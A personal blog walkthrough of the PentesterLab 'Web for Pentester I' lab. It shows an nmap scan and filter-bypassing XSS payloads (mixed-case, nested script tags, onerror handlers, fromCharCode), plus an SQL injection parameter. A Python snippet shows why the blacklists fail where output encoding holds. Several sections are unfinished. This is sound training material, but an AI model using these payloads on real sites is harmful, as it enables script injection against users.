30 March 2023

Pentesting Fun Stuff

following the cyber security path…

Web for pentester I

Introduction

This is an exercise from PentesterLab which contains some of the basic web vulnerabilities.

Location

https://www.pentesterlab.com/exercises/web_for_pentester

Getting started

To get a view on what is running, I start with an nmap scan.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $nmap -A -T4 -sV -p- 192.168.171.5
Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-09 14:13 CET
Nmap scan report for 192.168.171.5
Host is up (0.00035s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0)
| ssh-hostkey:
|   1024 af:d9:da:f7:c8:4f:6e:f2:8e:53:37:8b:c8:a7:5c:7d (DSA)
|_  2048 ad:ef:c3:9f:6e:15:6c:02:33:d5:5c:71:dc:ee:1f:26 (RSA)
80/tcp  open  http    Apache httpd 2.2.16 ((Debian))
|_http-server-header: Apache/2.2.16 (Debian)
|_http-title: PentesterLab » Web for Pentester
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds

Three ports are open: 22 (SSH), 80 (HTTP) and 389 (LDAP).
The website lists the following sections:

  1. XSS
  2. SQL injections
  3. Directory traversal
  4. File inclusion
  5. Code injection
  6. Command injection
  7. LDAP attack
  8. File upload
  9. XML attack

I’m going to start from the top and work my way down.

1. XSS

When I follow the first link in the section “XSS” I find a parameter which holds the value ‘hacker’.
[screenshot: xss1]

To test for a possible XSS vulnerability I replace the value with a piece of JavaScript code.
This value doesn’t get validated properly and is echoed directly back onto the page.
[screenshot: xss3]
When viewing the source code I see that the request is echoed back without any encoding.

Hello
alert("XSS");      <footer>
        <p>&copy; PentesterLab 2013</p>
      </footer>

When I follow example 2 and inject the same JavaScript code, I get a different result.
[screenshot: xss2-1]
When viewing the source code I see that ‘<script>’ and ‘</script>’ are filtered out. When I play with the casing a little, the script does get echoed back correctly.

Hello
<scriPt>alert("XSS");</scriPt>      <footer>
        <p>&copy; PentesterLab 2013</p>
      </footer>

The third example uses a different filter. This time the solution lies in the following payload.

?name=<script<script>>alert('XSS')<</script>/script>

The fourth example filters on the whole ‘<script>’ and renders it useless. But when using an HTML tag with an event handler, I can still get a pop-up.

?name=<img src='qwerty' onerror='alert("XSS")' />
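To show why these blacklists fail where output encoding holds, here is an added Python example (not part of the write-up or of PentesterLab's code) that reconstructs the filters of examples 2 to 4 the way the text describes them (those reconstructions are assumptions, not the lab's source) and runs the page's payloads through each filter and through html.escape.

```python
import html
import re

# Payloads copied from the write-up (examples 2, 3 and 4).
PAYLOADS = {
    "example2": '<scriPt>alert("XSS");</scriPt>',
    "example3": "<script<script>>alert('XSS')<</script>/script>",
    "example4": "<img src='qwerty' onerror='alert(\"XSS\")' />",
}


def filter_example2(value: str) -> str:
    """Assumed filter: case-sensitive removal of the literal tags (mixed case slips past)."""
    return value.replace("<script>", "").replace("</script>", "")


def filter_example3(value: str) -> str:
    """Assumed filter: case-insensitive but single pass; removing the inner tag
    glues the outer fragments back into a complete tag."""
    return re.sub(r"</?script>", "", value, flags=re.IGNORECASE)


def filter_example4(value: str) -> str:
    """Assumed filter: reject anything containing 'script'; other tags still pass."""
    return "" if re.search(r"script", value, re.IGNORECASE) else value


def encode_output(value: str) -> str:
    """The fix: entity-encode at output time instead of blacklisting input."""
    return html.escape(value, quote=True)


def still_active(fragment: str) -> bool:
    """Crude check on the reflected fragment: an unescaped script tag or an
    inline on* event handler is still present."""
    pattern = r"<script>|<\w+[^>]*\son\w+\s*="
    return re.search(pattern, fragment, re.IGNORECASE) is not None


FILTERS = {"example2": filter_example2, "example3": filter_example3,
           "example4": filter_example4}


def compare() -> dict:
    """Per example: (payload survives the blacklist, payload survives encoding)."""
    return {name: (still_active(FILTERS[name](payload)),
                   still_active(encode_output(payload)))
            for name, payload in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (after_filter, after_encoding) in compare().items():
        print(f"{name}: blacklist lets it through={after_filter}, "
              f"encoded output still active={after_encoding}")
```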

For the rest of the examples I’m only going to write up the correct payload.
Example 5:

?name=<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>

Example 6:

?name=hacker"; alert("n13mant");"

Example 7:

?name=hacker'; alert('n13mant');'

Example 8:

/xss/example8.php/"><script>alert(String.fromCharCode(34, 110, 49, 51, 109, 97, 110, 116, 34))</script>

Example 9:
At the time of writing this example doesn’t run in modern browsers. I could download an old browser version and run it, but I won’t. This example is easily executed by replacing #hacker with #<script>alert("n13mant")</script>.

2. SQL injections

Example 1:
[screenshot: sql1]
Now let’s add a single quote.
[screenshot: sql2]
Now let’s add a double quote.
[screenshot: sql3]
So with the single quote I mess up the query. Let’s build further on that.
[screenshot: sql4]
Example 2:
[screenshot: sql2-1]
No space? No problem!
[screenshot: sql2-2]
Example 3:
The same solution works for this example, but its purpose is to bypass the filter using /**/ comments.
[screenshot: sql3-1]
Example 4:
[screenshot: sql4-1]
Example 5:
[screenshot: sql5-1]
Example 6:
[screenshot: sql6-1]
Example 7:
Before URL encoding.
[screenshot: sql7-1]

After URL encoding.
[screenshot: sql7-2]
Example 8:

?order=IF%282,%20name,age%29


3. Directory traversal

Example 1:
[screenshot: pt1-1]
Example 2:
[screenshot: pt2-1]
Example 3:
[screenshot: pt3-1]


4. File inclusion

Example 1:
[screenshot: fi1-1]
So far I have a Local File Inclusion. Now to get a Remote File Inclusion: for this I’ve created a PHP file with phpinfo() in it.
[screenshot: fi1-2]
Example 2:
[screenshot: fi2-2]
[screenshot: fi2-1]

5. Code injection

Example 1:
[screenshot: code_inj1-1]
Example 2:
[screenshot: code_inj2-1]
Example 3:
The regex got modified to search and replace n13mant with n13mant/e, which causes ‘hacker’ to be interpreted as PHP code.
[screenshot: code_inj3-1]
Example 4:
[screenshot: code_inj4-1]

6. Command injection

To be continued….

7. LDAP attack

To be continued….

8. File upload

To be continued….

9. XML attack

To be continued….